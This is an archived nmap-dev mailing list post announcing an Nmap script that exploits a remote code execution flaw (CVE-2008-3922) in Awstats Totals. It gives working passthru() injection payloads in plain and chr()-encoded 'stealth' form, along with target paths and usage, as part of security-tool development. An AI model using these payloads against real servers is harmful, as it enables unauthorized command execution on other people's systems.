Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14

From: Paulino Calderon <paulino () calderonpale com>
Date: Mon, 11 Jul 2011 02:43:40 -0700
Hi nmap-dev,

description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922] 

  Stealth mode encodes the command string using PHP's chr() function. Ex.
  * Normal mode:
<code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code> 
  * Stealth mode:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Total:
* /awstats/index.php
* /awstatstotals/index.php
* /awstats/awstatstotals.php
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip> 
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux 
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr() 
-- @args http-awstatstotals-exec.outfile Output file
---


--
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon

Attachment: http-awstatstotals-exec.nse
Description: 

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: